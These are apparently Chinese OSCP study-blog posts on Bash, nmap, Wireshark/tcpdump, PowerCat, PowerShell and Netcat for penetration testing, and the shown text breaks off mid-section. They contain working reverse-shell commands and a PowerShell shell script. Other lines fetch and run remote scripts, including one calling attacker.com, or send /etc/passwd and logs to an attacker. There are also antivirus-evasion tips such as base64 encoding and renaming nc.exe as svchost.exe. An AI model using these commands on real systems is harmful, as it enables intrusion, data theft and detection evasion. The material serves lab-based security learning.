3echo "欢迎使用本脚本！当前用户：$USER"
4}
5
6# 调用函数
7welcome

输出：

1欢迎使用本脚本！当前用户：ubuntu

2. 函数参数

函数通过位置参数（$1、$2…）接收参数，与脚本参数类似。

示例 2：带参数的函数

1# 定义一个加法计算器
2add() {
3local sum=$(( $1 + $2 )) # 使用 local 定义局部变量
4echo "$1 + $2 = $sum"
5}
6
7# 调用函数并传递参数
8add 5 3

输出：

15 + 3 = 8

3. 返回值

Bash 函数通过 return 返回 退出状态码（0 表示成功，非 0 表示错误），或通过 echo 输出结果。

示例 3：返回状态码

 1# 检查文件是否存在
 2file_exists() {
 3if [ -f "$1" ]; then
 4 return 0 # 文件存在，返回成功
 5else
 6 return 1 # 文件不存在，返回失败
 7fi
 8}
 9
10# 调用函数并检查返回值
11if file_exists "/etc/passwd"; then
12echo "文件存在！"
13else
14echo "文件不存在！"
15fi

示例 4：返回字符串

1# 生成问候语（通过 echo 返回结果）
2get_greeting() {
3local name=$1
4echo "你好，$name！今天是 $(date +%F)"
5}
6
7# 捕获函数输出
8message=$(get_greeting "大黑阔")
9echo "$message"

输出：

1你好，小明！今天是 2023-10-05

4. 局部变量

使用 local 关键字定义局部变量，避免污染全局作用域。

 1# 生成问候语（通过 echo 返回结果）
 2get_greeting() {
 3local name=$1
 4globalname=$2
 5echo "你好，$name！今天是 $(date +%F)"
 6}
 7
 8# 捕获函数输出
 9get_greeting "大黑阔" "Hacker"
10echo $name # 局部变量不可见
11echo $globalname

5. 高级用法

递归函数

 1# 计算阶乘（递归实现）
 2factorial() {
 3if [ $1 -le 1 ]; then
 4 echo 1
 5else
 6 local prev=$(factorial $(( $1 - 1 )) )
 7 echo $(( $1 * $prev ))
 8fi
 9}
10
11# 计算 5!
12result=$(factorial 5)
13echo "5! = $result" # 输出 "5! = 120"

函数库

将常用函数保存为独立文件（如 utils.sh），通过 source 导入：to_upper函数实现小写转大写。

1# utils.sh
2to_upper() {
3echo "$1" | tr '[:lower:]' '[:upper:]'
4}
5
6# main.sh
7#!/bin/bash
8source utils.sh
9echo $(to_upper "hello")

6. 注意事项

定义顺序：函数必须在调用之前定义。
命名冲突：避免函数名与系统命令或别名重复。
参数传递：参数通过空格分隔，若参数含空格需用引号包裹（如 func "参数 1"）。
返回值限制：return 只能返回 0-255 的整数，返回字符串或复杂数据需用 echo。

布尔逻辑运算

在 Bash 中，&&、||、& 和 | 是常用的操作符，用于控制命令的执行逻辑和流程。以下是它们的详细解释及示例：

1. `&&`（逻辑与）

作用：只有 前一个命令成功执行（退出状态码为 0），才会执行后面的命令。

1mkdir mydir && cd mydir # 先创建目录，若成功则进入该目录

如果 mkdir mydir 成功（目录创建成功），则执行 cd mydir。
如果 mkdir 失败（如目录已存在），则不会执行 cd。

2. `||`（逻辑或）

作用：只有 前一个命令执行失败（退出状态码非 0），才会执行后面的命令。

1ping -c1 google.com || echo "网络不可达" # 若 ping 失败，则提示错误

如果 ping 失败（网络断开），则执行 echo 输出提示。
如果 ping 成功，不执行 echo。

3. `&`（后台执行）

作用：将命令放入 后台执行，终端可继续输入其他命令。

1sleep 10 & # 后台休眠10秒，终端可继续操作

命令后加 & 会返回一个后台进程的 PID（如 [1] 12345）。
可通过 jobs 查看后台任务，fg %1 将任务调回前台。

4. `|`（管道）

作用：将 前一个命令的输出 作为 后一个命令的输入。

1cat log.txt | grep "error" | wc -l # 统计 log.txt 中 "error" 的行数

cat log.txt 输出文件内容。
grep "error" 过滤含 “error” 的行。
wc -l 统计行数。

组合使用示例

场景：下载文件，若失败则重试，成功后解压并删除原文件。

1wget http://example.com/file.tar.gz && \
2tar -xzf file.tar.gz || \
3echo "下载失败，请检查网络！"

wget 下载文件，若成功则执行 tar 解压。
若 wget 失败，直接执行 echo 提示错误。

符号优先级

默认优先级：&& 和 || 的优先级低于 | 和 &。
强制优先级：用 () 或 {}
分组：

1(cmd1 && cmd2) || cmd3 # 若 cmd1 和 cmd2 都成功则不执行 cmd3，否则执行

实操练习1-网页地址查找

1wget www.megacorpone.com
2ls -al index.html 
3grep "href=" index.html

1grep "href=" index.html | grep "\.megacorpone" | grep -v "www\.megacorpone\.com" | head
2grep "href=" index.html | grep "\.megacorpone" | grep -v "www\.megacorpone\.com" | awk -F "http://" '{print $2}'
3
4grep "href=" index.html # 1. 提取所有包含 href= 的 HTML 行
5| grep "\.megacorpone" # 2. 筛选含 .megacorpone 的行（子域名或路径）
6| grep -v "www\.megacorpone\.com" # 3. 排除含 www.megacorpone.com 的行
7| head # 4. 仅显示前 10 条结果

1grep "href=" index.html | grep "\.megacorpone" | grep -v "www\.megacorpone\.com" | awk -F "http://" '{print $2}' | cut -d "/" -f 1
2grep -o '[^/]*\.megacorpone\.com' index.html | sort -u > list.txt

命令 1：提取特定子域名并处理链接结构

分步解析

grep "href=" index.html
- 从 index.html 中提取所有包含 href= 的行（HTML 超链接标签）。
grep "\.megacorpone"
- 筛选包含 .megacorpone 的行（匹配子域名或路径中的该字段）。
grep -v "www\.megacorpone\.com"
- 排除包含 www.megacorpone.com 的行（主站域名）。
awk -F "http://" '{print $2}'
- 以 http:// 为分隔符，提取其后的内容（如 cdn.megacorpone.com/style.css）。
cut -d "/" -f 1
- 以 / 为分隔符，提取第一个字段（即域名部分，如 cdn.megacorpone.com）。

命令 2：直接匹配并收集所有子域名

分步解析

grep -o '[^/]\*\.megacorpone\.com'
- -o：仅输出匹配的部分。
- 正则
```
[^/]*\.megacorpone\.com
```
  - [^/]*：匹配不包含 / 的任意字符（避免包含路径或端口）。
  - \.megacorpone\.com：匹配以 .megacorpone.com 结尾的域名。
sort -u
- 对结果排序并去重（-u 表示唯一性）。
> list.txt
- 将结果保存到 list.txt 文件。

主机ip筛查

1for url in $(cat list.txt); do host $url; done
2for url in $(cat list.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u

查找发现教材上的示例网页页面中的子域名，ip主要集中在加拿大（这里和教材示例不同，推测是因为使用了VPN的缘故，以及网页距离写教材时已经过去多年，更换过服务器）。

实操练习2-筛选漏洞脚本并下载

1searchsploit afd windows -w -t
2searchsploit afd windows -w -t | grep http | cut -f 2 -d "|"
3mkdir afd && cd afd
4for e in $(searchsploit afd windows -w -t | grep http | cut -f 2 -d "|"); do exp_name=$(echo $e | cut -d "/" -f 5) && url=$(echo $e | sed 's/exploits/raw/') && wget -q --no-check-certificate $url -O $exp_name; done

1file 17133
2cat 17133

实操练习3-Nmap扫描

1sudo nmap --script=vuln -p- -T4 -iL nmaphost.txt --min-rate 1000 --open
2sudo nmap -A -p80 --open 10.11.1.0/24 -oG nmap-scan_10.11.1.1-254
3cat nmap-scan_10.11.1.1-254 | grep 80 | grep -v "Nmap"
4cat nmap-scan_10.11.1.1-254 | grep 80 | grep -v "Nmap" | awk '{print $2}'
5for ip in $(cat nmap-scan_10.11.1.1-254 | grep 80 | grep -v "Nmap" | awk '{print $2}'); do cutycapt --url=$ip --out=$ip.png;done

课后练习

Research Bash loops and write a short script to perform a ping sweep of your target IP range of 10.11.1.0/24.
Try to do the above exercise with a higher-level scripting language such as Python, Perl, or Ruby.
Use the practical examples in this module to help you create a Bash script that extracts JavaScript files from the access_log.txt file (http://www.offensive-security.com/pwkfiles/access_log.txt.gz). Make sure the file names DO NOT include the path, are unique, and are sorted.
Re-write the previous exercise in another language such as Python, Perl, or Ruby.
研究 Bash 循环，编写一个简短的脚本，对目标 IP 范围 10.11.1.0/24 执行 Ping 扫描。
尝试用 Python 等高级语言实现上述功能。
使用本模块的实例，编写一个 Bash 脚本从 access_log.txt 中提取 JavaScript 文件名，要求文件名不包含路径、唯一且排序。
用 Python 等语言重写上述提取 JavaScript 文件名的功能。

1. Bash 脚本：Ping 扫描 `10.11.1.0/24` 网段

这里为了能有输出，改为172.168.169.0/24网段，时我本地虚拟机的内网

#!/bin/bash
# 遍历 1-254，发送 Ping 请求并输出存活主机
for ip in {1..254}; do
 target="172.168.169.$ip"
 # -c 1: 发送 1 个包，-W 1: 超时 1 秒
 ping -c 1 -W 1 $target > /dev/null 2>&1
 if [ $? -eq 0 ]; then
 echo "$target is up"
 fi
done

2. Python 脚本：Ping 扫描 `10.11.1.0/24` 网段

import os
import subprocess
from concurrent.futures import ThreadPoolExecutor

def ping_host(ip):
 target = f"172.168.169.{ip}"
 # 调用系统 Ping 命令（Windows 需将 '-c 1' 改为 '-n 1'）
 result = subprocess.run(['ping', '-c', '1', '-W', '1', target], 
 stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
 if result.returncode == 0:
 print(f"{target} is up")

# 使用多线程加速扫描（1-254）
with ThreadPoolExecutor(max_workers=50) as executor:
 executor.map(ping_host, range(1, 255))

3. Bash 脚本：从 `access_log.txt` 提取唯一 JS 文件名

wget --secure-protocol=TLSv1_2 https://www.offensive-security.com/pwk-files/access_log.txt.gz
gunzip access_log.txt.gz 


#!/bin/bash
# 提取所有 JS 文件，去重并排序
grep -oP 'GET \K[^ ]+?\.js' access_log.txt | awk -F/ '{print $NF}' | sort -u

说明：

grep -oP 'GET \K[^ ]+?\.js': 匹配 GET 请求中的 .js 文件路径，\K 丢弃 GET 前缀。
awk -F/ '{print $NF}': 以 / 分割路径，输出最后一个字段（文件名）。
sort -u: 排序并去重。

4. Python 脚本：提取唯一 JS 文件名

 1import re
 2from collections import defaultdict
 3
 4js_files = set()
 5
 6# 匹配 GET 请求中的 JS 文件
 7pattern = re.compile(r'GET\s+([^ ]+?\.js)')
 8
 9with open('access_log.txt', 'r') as f:
10 for line in f:
11 match = pattern.search(line)
12 if match:
13 path = match.group(1)
14 # 提取文件名（忽略路径）
15 filename = path.split('/')[-1]
16 js_files.add(filename)
17
18# 排序并输出
19for filename in sorted(js_files):
20 print(filename)

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day12 Kali渗透工具Powercat和Wireshark、tcpdump

Thu, 15 May 2025 10:40:48 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

PowerCat

概述

定义：基于 PowerShell 的 Netcat 变种，支持 TCP/UDP 通信、端口转发和反向 Shell。
优势：无需安装，可直接在内存中运行，规避杀毒软件检测（上一章的原版powershell不关WD直接用不了，实际环境中是很鸡肋的）。

渗透测试用途

反向 Shell：绕过防火墙建立远程控制通道。
文件传输：在攻击者和目标间传输数据。
端口扫描：探测开放端口和服务。
代理跳板：通过目标主机访问内网资源。

使用方法

步骤 1：加载 PowerCat

1# kali下载
2sudo apt install powercat
3#安装后文件位于，/usr/share/windows-resources/powercat,需要拷贝到windows中执行
4
5# Windows下载kali的文件
6powershell -c "(new-object System.Net.WebClient).DownloadFile('http://172.168.169.128:8000/powercat.ps1','C:\Users\Administrator\Downloads\powercat.ps1')"
7
8# Windows远程加载（常用）,不加载用不了的
9IEX (New-Object Net.WebClient).DownloadString('http://172.168.169.128:8000/powercat.ps1')

步骤 2：常用操作

1# 监听端口并获取反向 Shell（攻击者端）
2powercat -l -p 4444 -e cmd
3
4# 目标机连接攻击者（反向 Shell）
5powercat -c attacker_ip -p 4444 -e cmd
6
7# 端口转发（将本地 8080 转发到 10.0.0.1:80）
8powercat -l -p 8080 -r tcp:10.0.0.1:80

记得关闭Windows Defender不然执行不成功。

powercat 传输文件

1kali：nc -nvlp 8000 > ahell.txt #接收端
2
3powercat -c 172.168.169.128 -p 8000 -i hello.txt #发送端

-c #客户端

-p #目标端口

-i #要传输的本地文件

反弹shell

1Kali：nc -nvlp 443 #控制端
2
3powercat -c 172.168.169.128 -p 443 -e cmd.exe #被控端

正向shell

1powercat -l -p 4443 -e cmd.exe #被控端
2
3kali： nc 172.168.169.136 4443 #控制端

加密防微软

1powercat -c 172.168.169.128 -p 443 -e cmd.exe -ge > bmshell.ps1
2
3# -ge（base64编码）
4
5# 编码以后就是全是乱码，所以在杀毒软件，或者说防守方看起来就不像是这个恶意的一个脚本文件。
6powershell.exe -E (bmshell.ps1用notepad打开复制编码）
7
8# 执行成功

Wireshark

Wireshark 和 Burp Suite 是两款广泛用于网络分析和安全测试的工具，但它们在功能、使用场景和目标用户上有显著区别。以下是两者的主要区别：

1. 核心功能

Wireshark
网络协议分析工具：主要用于捕获和分析网络流量（所有经过网卡的数据包）。
被动监听：监控网络流量，不能直接修改数据包。
协议解析：支持数千种协议（如 TCP/IP、HTTP、DNS、ARP 等），提供详细的协议层级解析。
用途：网络故障排查、性能分析、协议学习、安全取证（如抓取恶意流量）。
Burp Suite
Web 安全测试工具：专注于 Web 应用程序的渗透测试和漏洞挖掘。
主动拦截与修改：作为代理服务器拦截、修改和重放 HTTP/HTTPS 请求。
模块化功能：包含 Scanner（漏洞扫描）、Intruder（暴力破解）、Repeater（请求重放）、Proxy（流量拦截）等模块。
用途：测试 SQL 注入、XSS、CSRF 等 Web 漏洞，模拟攻击行为。

2. 使用场景

Wireshark
分析网络层（如 TCP 连接问题）或传输层（如丢包、延迟）问题。
监控所有网络流量（包括非 HTTP 协议，如 DNS、ICMP、VoIP）。
解密 SSL/TLS 流量（需配置私钥）。
Burp Suite
测试 Web 应用程序的安全性（如 API、网站前后端）。
修改 HTTP 请求参数（如 Cookie、Header）以验证漏洞。
自动化扫描 Web 应用的常见漏洞（如 OWASP Top 10）。

3. 协议支持

Wireshark
支持几乎所有网络协议（从底层以太网到应用层协议）。
适用于分析非 Web 流量（如 FTP、SSH、SMTP）。
Burp Suite
主要针对 HTTP/HTTPS 协议，部分功能支持 WebSocket。
无法直接分析非 HTTP 流量（如 ICMP、TCP 握手过程）。

4. 操作方式

Wireshark
需要选择网卡或导入抓包文件（.pcap）。
通过过滤器（如 http.request.method == "GET"）筛选流量。
Burp Suite
需要配置浏览器代理（如 127.0.0.1:8080）以拦截流量。
通过模块化工具链（如 Proxy → Repeater → Intruder）进行测试。

5. 用户角色

Wireshark
网络管理员、运维工程师、协议开发人员。
Burp Suite
安全工程师、渗透测试人员、Web 开发人员。

6. 典型应用示例

Wireshark
分析为什么某个设备无法连接到服务器（检查 TCP 三次握手是否完成）。
捕获 DNS 查询失败的根本原因。
Burp Suite
修改登录请求中的密码参数，测试是否存在 SQL 注入漏洞。
使用 Intruder 模块暴力破解弱密码。

总结

对比项	Wireshark	Burp Suite
定位	网络流量分析工具	Web 应用安全测试工具
协议支持	所有网络协议	主要 HTTP/HTTPS
操作方式	被动监听、解析流量	主动拦截、修改和重放请求
核心用户	网络工程师、运维人员	安全工程师、Web 开发者
典型场景	排查网络故障、学习协议	挖掘 Web 漏洞、模拟攻击

协同使用

在实际工作中，两者可以互补：

用 Wireshark 抓取底层网络问题（如 TCP 连接失败）。
用 Burp Suite 深入测试 Web 应用逻辑漏洞（如越权访问）。

实操

使用root账号运行wireshark存在风险

抓包能力通过/usr/bin/dumpcap实现，默认只有root，wireshark组成员抓包

.允许普通用户在所有网卡抓包

1sudo usermod -aG wireshark $USER

指定ip地址，或者直接选择网卡查看实时流量

用筛选器做流量筛选

ip.addr==172.168.169.128

一、Wireshark 图形界面常用过滤语法

在 Wireshark 的过滤栏中，可以通过协议、字段、逻辑运算符等快速筛选数据包。以下是一些常用过滤命令：

1. 基础过滤

按协议过滤：

tcp # 显示所有 TCP 流量
udp # 显示所有 UDP 流量
http # 显示 HTTP 流量
dns # 显示 DNS 查询/响应
icmp # 显示 ICMP 流量（如 ping）
ssl # 显示 SSL/TLS 流量

按 IP 地址过滤：

ip.addr == 192.168.1.100 # 显示与指定 IP 相关的流量（源或目标）
ip.src == 192.168.1.100 # 显示源 IP 为 192.168.1.100 的流量
ip.dst == 10.0.0.1 # 显示目标 IP 为 10.0.0.1 的流量

按端口过滤：

tcp.port == 80 # 显示 TCP 端口为 80 的流量（HTTP）
udp.port == 53 # 显示 UDP 端口为 53 的流量（DNS）
tcp.dstport == 443 # 显示目标 TCP 端口为 443 的流量（HTTPS）

2. 高级过滤

组合逻辑运算符：

http && ip.src == 192.168.1.100 # 显示指定 IP 的 HTTP 流量
tcp.port == 80 || tcp.port == 443 # 显示 HTTP 或 HTTPS 流量
!arp # 排除所有 ARP 流量

按内容过滤：

http.request.uri contains "login" # 显示 URL 包含 "login" 的 HTTP 请求
tcp.payload contains "password" # 显示 TCP 载荷中包含 "password" 的数据包

按协议字段过滤：

http.response.code == 404 # 显示所有 HTTP 404 响应
tcp.flags.syn == 1 # 显示 TCP SYN 标志位为 1 的数据包（握手）
dns.qry.type == A # 显示 DNS A 记录查询

3. 流量分析

统计特定流量：

tcp.analysis.retransmission # 显示 TCP 重传的数据包
tcp.analysis.duplicate_ack # 显示重复确认包
tcp.analysis.zero_window # 显示 TCP 零窗口（流量控制问题）

时间范围过滤：

frame.time >= "2023-10-01 12:00:00" && frame.time <= "2023-10-01 13:00:00"

二、命令行工具 `tshark` 的实用命令

tshark 是 Wireshark 的命令行版本，适用于服务器环境或自动化脚本。

1. 基本捕获

tshark -i eth0 # 捕获 eth0 网卡的流量
tshark -i any # 捕获所有网卡的流量
tshark -w output.pcap # 将捕获的流量保存到文件
tshark -r input.pcap # 读取并分析已有的抓包文件

2. 过滤捕获

tshark -i eth0 -f "tcp port 80" # 捕获 TCP 80 端口的流量（BPF 语法）
tshark -i eth0 -Y "http" # 捕获并实时显示 HTTP 流量（显示过滤）
tshark -r input.pcap -Y "ip.addr==192.168.1.100" # 从文件过滤指定 IP

3. 输出格式

tshark -r input.pcap -T fields -e ip.src -e http.request.uri # 提取指定字段
tshark -r input.pcap -V # 显示详细协议解析
tshark -r input.pcap -qz "io,phs" # 统计流量协议分布

4. 高级功能

提取 HTTP 请求：

tshark -r input.pcap -Y "http.request" -T json > http_requests.json

统计 TCP 会话：

tshark -r input.pcap -qz conv,tcp # 列出所有 TCP 会话（源/目标 IP 和端口）

解密 HTTPS 流量（需私钥）：

tshark -r encrypted.pcap -o "tls.keylog_file:sslkeylog.log" -Y "http"

三、其他实用技巧

保存过滤器：在 Wireshark 中右键点击过滤栏 → “Save Filter” 可保存常用过滤条件。
导出特定数据：

导出 HTTP 文件：File → Export Objects → HTTP。
导出特定数据包：右键数据包 → “Export Packet Bytes”。

着色规则：通过 View → Coloring Rules 自定义颜色标记特定流量（如高亮错误码 500）。

总结

场景	命令/语法示例
抓取 HTTP 流量	`tshark -i eth0 -Y "http"`
分析指定 IP 的 DNS 查询	`dns && ip.src==192.168.1.100`
查找 TCP 重传	`tcp.analysis.retransmission`
提取 URL 中的关键字	`http.request.uri contains "admin"`

通过灵活组合过滤语法和命令行工具，可以快速定位网络问题或分析安全事件。

Tcpdump

Tcpdump 106是基于文本的网络嗅探器，尽管缺少图形界面，但仍具有简化，强大和灵活的特点。它是迄今为止最常用的命令行数据包分析器，可以在大多数Unix和Linux操作系统上找到，但是本地用户权限决定了捕获网络流量的能力。

1# 下载官网练习包
2wget wget https://www.offensive-security.com/pwk-online/password_cracking_filtered.pcap
3
4# 用tcpdump读取流量包
5sudo tcpdump -r password_cracking_filtered.pcap

读取是全部显示的，我们可以用一些脚本来做过滤。

1sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $3}' | sort | uniq -c | head
2sudo tcpdump -n -r password_cracking_filtered.pcap | awk -F" " '{print $5}' | sort | uniq -c | head
3
4sudo tcpdump -n -r password_cracking_filtered.pcap | # 读取抓包文件
5awk -F" " '{print $3}' | # 提取第三列字段
6sort | # 排序
7uniq -c | # 统计唯一值出现次数
8head # 显示前10行结果

也可以用tshark来做这个功能

tshark -r password_cracking_filtered.pcap -T fields -e ip.dst | sort | uniq -c | sort -nr | head

可以发现172.16.40.10这个ip请求量尤其多，推测是有爆破攻击行为。所以进一步排查。

sudo tcpdump -n src host 172.16.40.10 -r password_cracking_filtered.pcap
sudo tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap
sudo tcpdump -n port 81 -r password_cracking_filtered.pcap

1sudo tcpdump -nX -r password_cracking_filtered.pcap

发现有一些和admin字样相关的信息

1sudo tcpdump -A -n 'tcp[13] = 24' -r password_cracking_filtered.pcap

1sudo tcpdump -A -n "tcp[13]=24" -r password_cracking_filtered.pcap | grep ^Authorization | sort -u

1sudo tcpdump -A -n "tcp[13]=24" -r password_cracking_filtered.pcap | grep ^Authorization | sort -u | cut -d " " -f 3 | base64 -d

优化显示输出

1sudo tcpdump -A -n "tcp[13]=24" -r password_cracking_filtered.pcap | 
2grep '^Authorization' | 
3sort -u | 
4cut -d " " -f 3 | 
5while read line; do echo "$line" | base64 -d; echo; done

可以看到这个行为就是在爆破admin用户的密码。

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day11 Kali渗透工具Powershell

Wed, 14 May 2025 16:44:55 +0000

关注 泷羽Sec和泷羽Sec-静安公众号，这里会定期更新与 OSCP、渗透测试等相关的最新文章，帮助你理解网络安全领域的最新动态。后台回复“OSCP配套工具”获取本文的工具

以下内容建议在虚拟机中测试，安装Windows10直接点击注册即可，安装Windows11可以参考如下教程设置后链接。win系统镜像可关注泷羽Sec-静安公众号，后台回复“OSCP配套工具”获取本文的工具，文件夹Day11-12中有。

手把手、超详细：安装Windows11 虚拟机Vmware 16.x Pro教程！

PowerShell

下载地址：https://aka.ms/PSWindows

概述

定义：微软开发的脚本语言和命令行 Shell，集成于 Windows 系统，支持自动化任务和系统管理。
特点：无需额外安装，可直接调用 .NET 框架，功能强大且灵活。

渗透测试用途

信息收集：枚举系统信息、进程、服务等（如 Get-Process）。
权限提升：利用漏洞或配置错误提权（如绕过 UAC）。
横向移动：通过 WMI 或 PSRemoting 控制内网其他主机。
文件传输：下载恶意文件（Invoke-WebRequest 或 IEX）。
持久化：创建计划任务、注册表项等维持访问。

PowerShell ISE和终端cmd不同，PowerShell ISE能执行的命令比终端多，而且ISE的界面类似普通编程IDE界面，上方可以编辑ps1文件，并运行，在下方显示运行结果。右侧显示各种模块的名称，可以直接查找后插入。

常用命令示例

 1# 绕过执行策略执行脚本
 2powershell -ExecutionPolicy Bypass -File script.ps1
 3
 4# 从远程加载并执行脚本（无文件攻击）
 5IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')
 6
 7# 编码命令绕过检测
 8$command = "Get-Process"
 9$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
10$encoded = [Convert]::ToBase64String($bytes)
11powershell -EncodedCommand $encoded

实操练习

1Get-ExecutionPolicy

作用：查看当前 PowerShell 的 脚本执行策略（Execution Policy）。
输出 RemoteSigned：表示当前策略允许运行 本地脚本，但来自互联网的脚本（如通过邮件或下载的脚本）必须经过 数字签名 才能运行。
渗透测试意义：攻击者需确认目标是否允许直接运行脚本，若策略为 Restricted（默认），则需绕过限制（如使用 -ExecutionPolicy Bypass）

1Set-ExecutionPolicy Unrestricted

作用：将执行策略修改为 Unrestricted，允许运行 所有脚本（包括远程未签名脚本），但执行远程脚本时会弹出警告。

渗透测试用途
- 绕过默认安全限制，便于直接运行恶意脚本（如从互联网下载的 .ps1 文件）。
- 通常在提权后使用，为后续攻击铺路。
风险：用户可能因忽略警告而误执行恶意脚本。

Kali 中自带一些用于渗透Windows的工具，存在/usr/share/windows-binaries文件夹下。用命令启动一个简单的服务器，可以访问下载即将要用到的软件。

1python3 -m http.server

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://172.168.169.128:8000/nc.exe','C:\Users\Administrator\Downloads\nc.exe')"

作用：使用 System.Net.WebClient 类从攻击者控制的服务器（192.168.162.128）下载 nc.exe（Netcat 工具），并保存到 C:\nc.exe。

渗透测试用途

下载攻击工具：Netcat 常用于创建反向 Shell、端口扫描或文件传输。
横向移动：将工具上传到目标内网主机，进一步控制其他设备。
持久化：结合计划任务或服务，维持长期访问权限。

如果是在靶机上测试，记得关闭Windows的防病毒功能，因为这个nv文件十分典型，会报病毒。如果是在实战渗透中，要对nc文件做加密以绕过检测。绕过检测技巧

使用加密协议（如 HTTPS）或混淆 URL。
重命名 nc.exe 为合法文件名（如 svchost.exe）。
直接在内存中加载工具（无文件攻击），避免写入磁盘。

反弹windows的shell到kali中

Windows中打开ISE，在编辑框中输入

$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0', 443);
$listener.start();
$client = $listener.AcceptTcpClient();
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535 | % {0};
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
 $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
 $sendback = (iex $data 2>&1 | Out-String);
 $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
 $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
 $stream.Write($sendbyte, 0, $sendbyte.Length);
 $stream.Flush();
 $client.Close();
 $listener.Stop()
}

然后在kali中输入

nc -nv 172.168.169.136 443

但是这样获得的链接不稳定，我们把('0.0.0.0', 443);改为攻击机的地址，就能获得稳定的shell。

$listener = New-Object System.Net.Sockets.TcpListener('172.168.169.128', 8888);
$listener.start();
$client = $listener.AcceptTcpClient();
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535 | % {0};
while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
 $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
 $sendback = (iex $data 2>&1 | Out-String);
 $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
 $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
 $stream.Write($sendbyte, 0, $sendbyte.Length);
 $stream.Flush();
 $client.Close();
 $listener.Stop()
}

由于之前我们已经用命令下载了nc.exe，所以我们可以在window上用nc方便快捷的建立一个反弹shell。

1./nc.exe 172.168.169.128 4444 -e cmd.exe

然后在kali上监听4444端口即可。

1 nc -nlvp 4444

🔔 想要获取更多网络安全与编程技术干货？

关注 泷羽Sec-静安 公众号，与你一起探索前沿技术，分享实用的学习资源与工具。我们专注于深入分析，拒绝浮躁，只做最实用的技术分享！💻

扫描下方二维码，马上加入我们，共同成长！🌟

👉 长按或扫描二维码关注公众号

或者直接回复文章中的关键词，获取更多技术资料与书单推荐！📚

Day8 Kali黑客工具NetCat和Socat

Fri, 11 Apr 2025 23:13:09 +0000

泷羽Sec-静安，专注网络安全与编程技术的学习与分享，探索技术细节与实际应用。声明：本公众号所分享的工具与资源，仅供学习与研究使用，严禁用于任何非法活动。

Netcat（nc）

Netcat（nc）因其灵活的TCP/UDP通信能力，在红队渗透测试中扮演着重要角色。• Netcat下载：Windows版nc.exe可从Sysinternals Suite获取。

1. 反向Shell获取控制权

用途：绕过防火墙限制，建立隐蔽的远程控制通道。
操作步骤：

攻击端监听（接收Shell）：

1nc -lvp 4444 -e /bin/bash # 传统方法（需目标支持-e参数）

目标端连接（主动回连）：
```
1nc [攻击者IP] 4444 -e /bin/bash # 直接执行Shell
```
绕过限制技巧（无-e参数时）：
```
1mkfifo /tmp/f; nc [攻击者IP] 4444 < /tmp/f | /bin/bash > /tmp/f 2>&1
```
优势：通过命名管道实现无-e参数环境下的Shell反弹。

2. 端口扫描与监听

用途：快速探测目标开放端口或搭建临时服务。
实战命令： • 端口扫描（快速识别脆弱服务）：

1nc -zv 192.168.1.100 1-1024 # 扫描1-1024端口（-z为扫描模式，-v显示详情）

• 监听端口（捕获敏感流量）：

1nc -l -p 8080 > captured_data.log # 记录所有传入数据到文件

3. 文件传输与数据窃取

用途：内网横向移动时快速交换工具或窃取数据。
操作示例： • 单向传输：

1# 接收端（攻击机）：
2nc -l -p 1234 > stolen_data.tar.gz
3
4# 发送端（目标机）：
5nc [攻击者IP] 1234 < /etc/passwd # 发送敏感文件

• 目录批量传输（结合tar压缩）：

1# 目标机打包发送：
2tar -czf - /var/log/ | nc [攻击者IP] 1234
3
4# 攻击机接收解压：
5nc -l -p 1234 | tar -xzvf -

4. 内网穿透与端口转发

用途：突破网络边界，访问受限内网资源。
典型场景： • 正向代理（目标机可直连外网）：

1# 目标机监听内网服务：
2nc -l -p 5555 -e /bin/bash # 暴露Shell到本地5555端口
3
4# 攻击机连接：
5nc [目标机公网IP] 5555

• 反向隧道（目标机仅允许出站）：

1# 攻击机监听：
2nc -lvp 4444
3
4# 目标机建立隧道：
5nc [攻击者IP] 4444 -e "nc 192.168.10.20 3389" # 转发内网RDP服务

5. 网络欺骗与信息收集

用途：模拟服务响应或抓取敏感信息。
技巧示例： • 伪造HTTP服务（诱捕凭证）：

1# 搭建钓鱼页面：
2echo "HTTP/1.1 200 OK\nContent-Type: text/html\n\n<LoginForm>" | nc -l -p 80

• 抓取Banner信息（服务指纹识别）：

1echo "HEAD / HTTP/1.0\n\n" | nc example.com 80 # 获取Web服务器类型

Netcat实战练习：

1. 实现Kali与Windows的简单聊天

步骤说明

• Kali端监听（作为服务器）：

1nc -lvp 4444

• Windows端连接（作为客户端）：

1nc.exe [Kali_IP] 4444

注意：Windows需提前下载nc.exe工具（如从Sysinternals Suite获取）。

双向通信

• 在任意一端输入文字，另一端实时显示。 • 验证：输入Hello from Kali!，Windows端应收到消息。

2. 使用Netcat创建反向/绑定Shell

a. Kali到Windows的反向Shell

• Kali监听：

1nc -lvp 5555

• Windows触发反向Shell：

